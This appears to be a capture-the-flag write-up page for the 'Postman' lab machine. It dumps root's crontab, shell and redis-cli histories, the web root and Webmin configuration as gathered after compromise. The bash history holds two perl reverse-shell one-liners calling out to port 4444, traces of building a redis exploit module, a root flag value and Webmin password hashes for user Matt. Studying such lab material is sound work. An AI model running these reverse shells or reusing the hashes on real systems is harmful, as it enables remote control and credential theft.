Beyond
This is the "beyond" page, where additional post-exploitation enumeration and assessment are carried out as the root
user after the target system has been compromised. It collects what was found in cron, the root home directory, the shell and redis-cli histories, the web root, and the Webmin configuration.
cron
root@Postman:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
@reboot ifconfig 192.168.0.80 netmask 255.255.255.0 up
@reboot iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6379
home
root@postman:~# ll
total 76
drwx------ 8 root root 4096 Sep 29 2020 ./
drwxr-xr-x 22 root root 4096 Sep 30 2020 ../
-rw------- 1 root root 14310 Sep 29 2020 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Aug 24 2019 .cache/
drwx------ 3 root root 4096 Aug 26 2019 .gnupg/
-rw------- 1 root root 28 Oct 25 2019 .lesshst
drwxr-xr-x 3 root root 4096 Aug 24 2019 .local/
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwxrwxr-x 6 root root 4096 Oct 2 2019 redis-5.0.0/
-rw------- 1 root root 79 Aug 25 2019 .rediscli_history
-rw-r--r-- 1 root root 33 oct 5 10:58 root.txt
-rw-r--r-- 1 root root 66 Oct 25 2019 .selected_editor
drwx------ 2 root root 4096 Aug 25 2019 .ssh/
drwxr-xr-x 2 root root 4096 Aug 25 2019 .tmp/
-rw------- 1 root root 2105 Sep 29 2020 .viminfo
.bash_history
root@Postman:~# cat .bash_history
clera
clear
ls
apt install ssh
nano /etc/ssh/sshd_config
service sshd restart
apt install net-tools
reboot
exit
nano /etc/hostname
hostname Postman
nano /etc/hosts
clear
service hostname restart
reboot
clear
deluser rachel
adduser Matt --home
adduser Matt --home /home/Matt/
adduser Matt --home /home/Matt
adduser Matt --home /home/Matt --force-badname
ls
rm web.deb
dpkg -i webmin.deb
cd /var/webmin
ls
locate miniserv
cd modules
ls
cd acl
ls
ls -la
cd ..
locate password_change.cgi
cd ..
ls
service webmin restart
ls
ls -la
cd modules/
ls -la
cd useradmin/
ls -la
cd ..
ls -la
cd ..
cd /etc/webmin
ls
nano config
ifconfig
cd /usr/share/webmin
ls
nano password_change.cgi
atom password_change.cgi
apt purge webmin
cd /
ls
cd /root
ls
dpkg -i webmin_1.920_all.deb
cd /var/webmin
ls
cd modules
ls
cd acl
ls
cd /etc/
ls
cd webmin
nano config
service webmin restart
apt install ssh
nano /etc/ssh/sshd_config
clear
ifconfig
reboot
clear
wget
wget wget http://prdownloads.sourceforge.net/webadmin/webmin_1.92_all.deb
wget http://prdownloads.sourceforge.net/webadmin/webmin_1.92_all.deb
ls
dpkg
dpkg -i web.deb
apt install perl
dpkg -i web.deb
apt install libnet-ssleay-perl
apt --fix-broken install
cd /var/webmin/
ls
cd ..
ls
cd webmin/
ls
ls -la
cd modules/
ls
apt purge webmin
cd ..
cd /var
;s
ls
clear
cd /etc/webmin
ls
nano miniserv.conf
cd acl
ls
ls -la
cd /var/webmin/modules
ls
cd ..
ls -la
cd /etc/webmin
ls
cd webmin
ls
cd ..
ls
ls -la
cd passw
cd passwd
;s
ls
cd ..
ls
cd ..
ls
cd var
cd webmin/
ls
cd modules/
ls
cd acl
ls
cd ..
cd webmin
ls
cd ..
ls -la
cd webmin
ls -la
cd /etc/
ls -la
find / -name "password_change.cgi"
nano /usr/share/webmin/password_change.cgi
service webmin restart
nano /usr/share/webmin/password_change.cgi
service webmin reload
nano /usr/share/webmin/password_change.cgi
reboot
service webmin start
ifconfig
systemctl enable webmin
reboot
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.4:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
apt install apache2
exit
mv SimpleHTTPPutServer.py /var/www/html/
exit
nano /usr/share/webmin/password_change.cgi
apt purge webmin
scp root@192.168.1.4:/root/Desktop/webmin_1.910_all.deb .
ls
dpkg -i webmin_1.910_all.deb
exit
apt install zip
ls
unzip leno-landing-page.zip
ls
rm documentation/ -R
rm index.html
cd web
ls
mv * ../
ls
ls -la
cd ..
ls -la
rm leno-landing-page.zip
service apache2 start
rm -R web
ls
mv SimpleHTTPPutServer.py pixova-lite.zip ../
ls
ls -la
rm * -R
ls
mv ../pixova-lite.zip .
ls
unzip pixova-lite.zip
ls
cd pixova-lite
mv * ../
ls
cd ..
rm pixova-lite
rm pixova-lite -R
ls
apt install php
service apache2 restart
ifconfig
ls
rm * -R
ls
cd ..
ls
cd html
ls
unzip Micrology\ Free\ Website\ Template\ -\ Free-CSS.com.zip
ls
mv micrology/* .
ls
cd micrology/
ls
cd micrology/
ls
mv * ../../
cd ..
ls
rm -R micrology/
rm 'Micrology Free Website Template - Free-CSS.com.zip'
rm readme.txt
rm LICENSE.txt
ls -la
nano index.html
service apache2 restart
nano index.html
service apache2 restart
nano index.html
ls
cd css
ls
cat * | "footer"
cat * | grep "footer"
cat * | grep "footer section"
cat * | grep "footersection"
nano index.html
cd ..
nano index.html
cd css
cat * | grep grd3
cat * | grep -l grd3
cat * | grep -l "grd3"
cat * | grep -H "grd3"
cat * | grep "grd3"
cat * | grep "grd3" -H
ls
grep -H "grd3" *.css
nano colors.css
grep -H "background" *.css
grep -H "background-image" *.css
cd ..
grep "href=" *
grep "hero" *
nano css/style
nano ccs/style
ls
nano style.css
cd ..
ls
mv SimpleHTTPPutServer.py html/upload/
cd html/upload/
ls
python -m SimpleHTTPPutServer 8080
mv SimpleHTTPPutServer.py ../
python ../SimpleHTTPPutServer.py 8080
php
python ../SimpleHTTPPutServer.py 8080
cd ..
python ../../SimpleHTTPPutServer.py 8080
python SimpleHTTPPutServer.py 8080
ls
python html/SimpleHTTPPutServer.py 8080
mv html/SimpleHTTPPutServer.py .
python SimpleHTTPPutServer.py 8080
nano /etc/httpd/conf/httpd.conf
find / -name ".htaccess"
cd html
nano .htaccess
python SimpleHTTPPutServer.py 8080
nano dbauth.php
nano put.php
nano .htaccess
service apache2 restart
tail -f /usr/local/apache/logs/error_log
ls
nano .htaccess
ls -la
service apache2 restart
ls -la /etc/apache2/apache2.conf
nano /etc/apache2/apache2.conf
service apache2 restart
service apache2 stop
service apache2 start
systemctl status apache2.service
nano /etc/apache2/apache2.conf
service apache2 restart
nano /etc/apache2/apache2.conf
service apache2 restart
systemctl status apache2.service
a2enmod
a2enmod rewrite
systemctl restart apache2
nano /etc/apache2/apache2.conf
systemctl restart apache2
systemctl status apache2.service
nano .htaccess
systemctl restart apache2
systemctl status apache2.service
apt install php
php -v
nano put.php
systemctl restart apache2
systemctl reload apache2
ls
rm dbauth.php
rm .htaccess
ls
ls -la
cd /var/www/html/upload
ls
wget https://www.arthur-mckay.com/wp-content/uploads/sites/5/2017/12/Cyber-security-web-banner.jpg
ls
cd /root
ls
unzup redis-5.0.0.tar.gz
unzip redis-5.0.0.tar.gz
ls
apt install gunzip
apt install gzip
gzip -d redis-5.0.0.tar.gz
ls
rm redis-5.0.0.tar
tar xvzf redis-5.0.0.tar.gz
ls
cd redis-5.0.0/
ls
nano INSTALL
nano README.md
make install
apt install make
make install
ls
cd utils/
ls
./install_server.sh
apt install redis=5.0.0
cd ..
make
cd ..
rm redis-5.0.0 -R
tar xzf redis-5.0.0.tar.gz
ls
cd redis-5.0.0/
make
ls
sudo apt install redis-server
apt --fix-broken
apt --fix-broken install
apt purge redis*
apt purge redis
rm * -R
cd ..
ls
rm redis-5.0.0 -R
rm *
ls
apt purge redis
reboot
apt purge redis
tar xzvf redis-5.0.0.tar.gz
ls
cd redis-5.0.0/
ls
make
apt install gcc
make
cd deps/
make hiredis jemalloc linenoise lua
ls
cd ..
make
make test
apt install tcl
make test
make install
make test
cd utils/
./install_server.sh
redis-cli
systemctl restart redis
systemctl enable redis
systemctl restart redis
systemctl enable redis
reboot
cd redis-5.0.0/
ls
cd utils
ls
systemctl enable redis
systemctl enable redis-server
reboot
ls
rm redis-5.0.0.tar.gz
ls
su Matt
reboot
service redis restart
nano /etc/ssh/sshd_config
service sshd restart
nano /etc/passwd
service passwd restart
su Matt
ls
chown root:root /usr/bin/base64
chmod +x /usr/bin/base64
chmod u-s /usr/bin/base64
ls -la /usr/bin/base64
python -m SimpleHTTPPutServer 127.0.0.1 8080
python -m SimpleHTTPServer 127.0.0.1 8080
python -m SimpleHTTPServer
python -m SimpleHTTPServer --help
python --help
su Matt
cd /usr/bin
ls
chown Matt:Matt base64
ls -la
su Matt
nano /etc/ssh/sshd_config
systemctl sshd reload
systemctl reload sshd
system disable redis-server
systemctl disable redis-server
systemctl enable redis
service redis start
ls
cd redis
cd redis-5.0.0/
ls
cd utils/
./install_server.sh
service redis start
cd ..
ls
cd ..
ls
apt purge redis
apt purge redis-server
cd redis-5.0.0/
ls
make install
redis
redis-cli
apt install redis-server
redis-cli
service redis start
systemctl enable redis
sudo netstat -lnp | grep redis
nano /etc/redis/redis.conf
service redis restart
sudo netstat -lnp | grep redis
service redis reload
service redis restart
systemctl reload redis
systemctl status redis.service
nano /var/run/redis/redis-server.pid
systemctl enable redis-server
systemctl status redis.service
systemctl enable redis-server
systemctl status redis.service
systemctl restart redis.service
systemctl status redis.service
nano /var/run/redis/redis-server.pid
nano /etc/redis/redis.conf
service redis reload
systemctl reload redis
systemctl restart redis
systemctl status redis.service
sudo netstat -lnp | grep redis
redis-cli -h `python -c 'print "A" * 300'`
apt install ld
ld
cd src
ls
scp module.o root@192.168.1.4:/root/redis-rce-master/
cd ..
ls
src
cd src
ls
make module.c
gcc -s module.c -o module.so
apt install liblua*
apt install liblua5.1-0-dev
ls
gcc -s module.c -o module.so
apt purge liblua5.1-0-dev
find / -name "lua.h"
cp /root/redis-5.0.0/deps/lua/src/lua.h .
gcc -s module.c -o module.so
ls
gcc -s module.c -o module.so
make distclean
make
ls
cd modules/
ls
cd ..
ls
nano module.c
gcc -s module.c -o module.so
cc … `pkg-config --cflags --libs lua-5.1`
apt install sudo apt-get install lua5.2
sudo apt-get install lua5.2
gcc -s module.c -o module.so
find / -name "lua.h"
ls
nano module.c
nano server.c
nano module.
nano server.h
gcc -s module.c -o module.so
ls
gcc -s module.c -o module.so
cd ..
ls
cd deps/
ls
cd lua/
ls
cd ser
cd src/
ls
pwd
cd ../../
ls
cd ..
cd src
nano module.c
nano server.h
gcc -s module.c -o module.so
ls
find / -name "module.c"
netstat -aln | grep python
netstat -aln
su Matt
reboot
netstat -aln | grep 127.0.0.1
exit
ifconfig
cd /var/www/html
ls
nano index.html
su Matt
ls
rm put.php
cd upload/
ls
nikto-test-HUB0MCmd.html
rm nikto-test-HUB0MCmd.html
ls
cd ..
ls -la
rmdir -R /var/lib/redis/.ssh
rmdir -r /var/lib/redis/.ssh
rmdir /var/lib/redis/.ssh
rmdir /var/lib/redis/.ssh -r
rmdir /var/lib/redis/.ssh -R
rmdir /var/lib/redis/.ssh -f
rm /var/lib/redis/.ssh/*
rmdir /var/lib/redis/.ssh
su Matt
reboot
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.10.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
su Matt
cd ~/
touch root.txt
echo 'a257741c5bed8be7778c6ed95686ddce' > root.txt
cd /var/lib/redis
ls
ls -la
rm scan.py
rm -R .ssh
rm exp.so
ls -la
chage -l root
chage -l Matt
chage -l redis
passwd root
reboot
echo 'network:
ethernets:
enp0s3:
addresses: [192.168.230.11/24]
gateway4: 192.168.230.254
dhcp4: no
nameservers:
addresses: [8.8.8.8,8.8.4.4]
optional: true
version: 2' > /etc/netplan/01-netcfg.yaml
cd /etc/netplan/
ls
netplan apply
echo 'network:
ethernets:
enp0s3:
addresses: [192.168.230.11/24]
gateway4: 192.168.230.254
dhcp4: no
nameservers:
addresses: [8.8.8.8,8.8.4.4]
optional: true
version: 2' > /etc/netplan/01-netcfg.yaml
netplan apply
ifconfig
exit
ps -aux
cd opt
ls
cd redis-5.0.0/
ls
crontab -l
whoami
su redis
netstat -a > text
less text
iptables -A INPUT -p tcp -s 0.0.0.0 --dport 25 -j ACCEPT
iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6739 -j ACCEPT
iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6379 -j ACCEPT
netstat -nlpt ~ grep 6379
service redis-server restart
reboot
netstat -nlpt > text
less text
cd /etc/redis/
ls
nano redis.conf
reboot
ifconfig
netstat -nlpt > text
less text
ifconfig
netstat -a
netstat -a > stats
less stats
netstat -al > stats
less stats
service redis-server status
t
exit
ifconfig
ifconfig 192.168.0.80 netmask 255.255.255.0
ifconfig enp0s3 192.168.0.80 netmask 255.255.255.0
ifconfig enp0s3 192.168.0.80 netmask 255.255.255.0 up
ifconfig
service redis-server status
service redis-server stop
nano /etc/redis/redis.conf
reboot
ifconfig
service redis-server status
find / -name "redis-server.pid"
cd /var/run/redis-server
cd /var/run/redis-server.conf
cd /var/run/
ls
cd redis
ls
ls -la
cd ..
nano redis_6379.pid
service redis-server status
less /var/log/redis/redis-server.log
rm /var/log/redis/redis-server.log
service redis-server status
less /var/log/redis/redis-server.log
touch /var/log/redis/redis-server.log
service redis-server start
touch /var/log/redis/redis-server.log
less /var/log/redis/redis-server.log
ps > ps
less ps
ps aux > ps
less ps
kill 354
service redis-server start
service redis-server status
less /var/log/redis/redis-server.log
reboot
ifconfig enp0s3 192.168.0.80 netmask 255.255.255.0 up
ifconfig
ls
rm stats
rm statsn
rm run
rm pp
netstat -al > stats
less stats
nano /etc/redis/redis.conf
reboot
ifconfig
ifconfig enp0s3 192.168.0.80 netmask 255.255.255.0 up
ifconfig
service redis-server status
systemctl edit redis-server
systemctl edit redis-server.service
systemctl disable redis-server
ls -la
cat text
netstat -al > new
less new
netstat -a > snew
less snew
reboot
netstat -a > ssnew
less ssnew
iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6739 -j ACCEPT
ifconfig
ifconfig enp0s3 192.168.0.80 netmask 255.255.255.0 up
ifconfig
nano /etc/redis/redis.conf
service redis-server status
ps -aux > new.t
less new.t
kill 324
service redis-server start
service redis-server status
nano /etc/network/interfaces
sudo ifdown enp0s3
nano /etc/network/interfaces
ip addr show
crontab -e
less ssnew
rm ssnew
rm snew
netstat -a > snew
less snew
crontab -e
less snew
crontab -e
less snew
crontab -e
reboot
ifconfig
ifconfig enp0s3 192.168.0.80 netmask 255.255.255.0 up
ifconfig
netstat -a > news
less news
crontab -l
ls -la
rm new news new.t snew stats text
ls -la
cd redis-5.0.0/
ls -la
cd tests
ls -la
cd ..
ls -la
cd ..
ls -la
systemctl disable redis-server
systemctl edit redis-server.service
less /var/log/redis/redis-server.log
ps aux > psn
less psn
kill 349
/etc/redis/
cd /etc/redis/
ls
nano redis.conf
systemctl disable redis
systemctl disable redis-server
reboot
netstat -a > newss
less newss
redis-server
ps -a
ps aux > newss
less newss
update-rc.d redis-server
update-rc.d redis-server remove
reboot
ps aux > newss
less newss
update-rc.d redis_6379 disable
reboot
netstat -a > l
less l
systemctl enable redis
systemctl enable redis-server
reboot
ls
rm l newss psn
netstat -a > l
less l
ls
rm l
ifconfig enp0s3 192.168.0.80 netmask 255.255.255.0 up
reboot
cd /etc/netplan/
ls -l
vim 01-netcfg.yaml
nano01-netcfg.yaml
nano 01-netcfg.yaml
netplan apply
ping -c 1 8.8.8.8
apt-get install ifupdown
apt-get install vim
apt-get update
vim /etc/default/grub
apt-get install vim
vim /etc/default/grub
vim /etc/network/interfaces
rm /etc/netplan/01-netcfg.yaml
apt-get remove netplan.io
ifconfig ens33
reboot
ifconfig
poweroff
apt -y install open-vm-tools#
apt -y install open-vm-tools
vim /etc/resolv.conf
apt -y install open-vm-tools
apt update
apt -y install open-vm-tools
service open-vm-tools restart
poweroff
.rediscli_history
root@postman:~# cat .rediscli_history
ping
set test "It's working!"
get test
exit
service redis start
exit
ping
exit
web app over port 80
root@Postman:~# ll /var/www/html
total 56
drwxr-xr-x 7 root root 4096 Aug 26 2019 ./
drwxr-xr-x 3 root root 4096 Aug 25 2019 ../
drwxr-xr-x 2 root root 4096 Aug 25 2019 css/
drwxr-xr-x 2 root root 4096 Apr 23 2019 fonts/
drwxr-xr-x 3 root root 4096 Apr 23 2019 images/
-rw-r--r-- 1 root root 3844 Aug 25 2019 index.html
drwxr-xr-x 2 root root 4096 Apr 23 2019 js/
-rw-r--r-- 1 root root 24465 Aug 25 2019 style.css
drwxr-xr-x 2 root root 4096 Aug 26 2019 upload/
Webmin
root@postman:~# cat /etc/webmin/miniserv.conf
port=10000
root=/usr/share/webmin
mimetypes=/usr/share/webmin/mime.types
addtype_cgi=internal/cgi
realm=Webmin Server
logfile=/var/webmin/miniserv.log
errorlog=/var/webmin/miniserv.error
pidfile=/var/webmin/miniserv.pid
logtime=168
ssl=1
no_ssl2=1
no_ssl3=1
no_tls1=1
no_tls1_1=1
ssl_honorcipherorder=1
no_sslcompression=1
env_WEBMIN_CONFIG=/etc/webmin
env_WEBMIN_VAR=/var/webmin
atboot=1
logout=/etc/webmin/logout-flag
listen=10000
denyfile=\.pl$
log=1
blockhost_failures=5
blockhost_time=60
syslog=1
ipv6=1
session=1
premodules=WebminCore
server=MiniServ/1.910
userfile=/etc/webmin/miniserv.users
keyfile=/etc/webmin/miniserv.pem
passwd_file=/etc/shadow
passwd_uindex=0
passwd_pindex=1
passwd_cindex=2
passwd_mindex=4
passwd_mode=0
preroot=authentic-theme
passdelay=1
login_script=/etc/webmin/login.pl
cipher_list_def=1
failed_script=/etc/webmin/failed.pl
logout_script=/etc/webmin/logout.pl
sudo=1
error_handler_404=404.cgi
error_handler_403=403.cgi
error_handler_401=401.cgi
nolog=.*xhr.*
logouttimes=
miniserv.users
root@Postman:~# cat /etc/webmin/miniserv.users
root:x:0
Matt:$1$66786052$X4Cmmtw8EF7bUyoj.vKG//:::::1566786052:$1$66750897$uFdZ1DtY4wVzGBtVY.xja/::0::::
Matt.acl
root@postman:~# cat /etc/webmin/Matt.acl
gedit2=
feedback=2
uedit2=
root=/
webminsearch=1
negative=0
gedit_mode=0
nodot=0
rpc=2
otherdirs=
uedit_mode=0
fileunix=
readonly=0
gedit=
uedit=